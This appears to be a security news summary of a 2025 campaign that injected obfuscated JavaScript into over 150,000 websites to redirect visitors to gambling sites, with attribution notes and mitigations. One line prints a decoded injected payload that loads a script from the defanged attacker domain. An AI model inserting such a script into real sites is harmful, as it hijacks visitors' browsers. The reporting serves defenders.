A widespread cyberattack has compromised over 150,000 legitimate websites by injecting malicious JavaScript that redirects visitors to Chinese-language gambling platforms. The campaign, first observed in February 2025 with 35,000 infected sites, has rapidly escalated, employing obfuscated scripts and iframe injections to hijack browsers. Attackers use domains like zuizhongyj[.]com to host payloads, which display full-screen overlays mimicking legitimate gambling sites such as Bet365^1.
TL;DR: Key Points
- Scope: 150,000+ websites compromised via JavaScript injections.
- Targets: Primarily Chinese-speaking users in China, Hong Kong, and the U.S.
- Techniques: Obfuscated scripts, iframe injections, and mobile-optimized redirections.
- Related Campaigns: Ties to DollyWay malware and VexTrio affiliate networks.
- Mitigation: Audit scripts, implement CSPs, and disable unused plugins.
Attack Mechanics and Techniques
The attackers leverage HTML entity encoding and hexadecimal obfuscation to evade detection. For example, a typical payload decodes to:
document.write(unescape("%3Cscript src='hxxps://zuizhongyj[.]com/payload.js'%3E%3C/script%3E"));This script forces redirects to gambling platforms like W88in[.]com or 551007t[.]cc. The campaign also enforces viewport tags to ensure seamless mobile redirection^2.
Infrastructure and Attribution
The operation shares infrastructure with the DollyWay malware family, active since 2016. DollyWay hijacks sites via Traffic Direction Systems (TDS) and monetizes through affiliate networks like LosPollos and PropellerAds. Recent disruptions led attackers to shift command-and-control (C2) to Telegram channels (e.g., trafficredirect)^3.
Mitigation Strategies
- Content Security Policies (CSPs): Restrict unauthorized script execution.
- Plugin Audits: Disable unused WordPress plugins; 10,000+ infections stem from DollyWay’s exploitation of outdated plugins^4.
- Monitoring: Detect anomalous iframe injections or redirects via log analysis.
Relevance to Security Professionals
- Red Teams: Study obfuscation techniques (e.g., HTML entity encoding) for evasion simulations.
- Blue Teams: Prioritize CSP implementation and client-side attack detection.
- Threat Intel Researchers: Track overlaps with VexTrio and DollyWay campaigns^5.
Conclusion
This campaign highlights the growing sophistication of client-side attacks. Organizations should adopt proactive measures, such as CSPs and rigorous plugin management, to mitigate risks.
References
[^1]: “Threat Actors Compromise 150,000 Websites to Promote Chinese Gambling Platforms“. GBHackers. [Accessed March 27, 2025].
[^2]: “150,000+ Websites Hijacked via JavaScript Injection for Gambling Redirects“. The Hacker News. [Accessed March 27, 2025].
[^3]: Denis Sinegubko (GoDaddy), “DollyWay’s shift to Telegram for redirects shows adaptability post-LosPollos disruption.”
[^4]: Himanshu Anand (c/side), “Client-side attacks like these are on the rise, with more findings daily.”
[^5]: Malware.news, DeveloperTech, Cyber Syrup. [Accessed March 27, 2025].
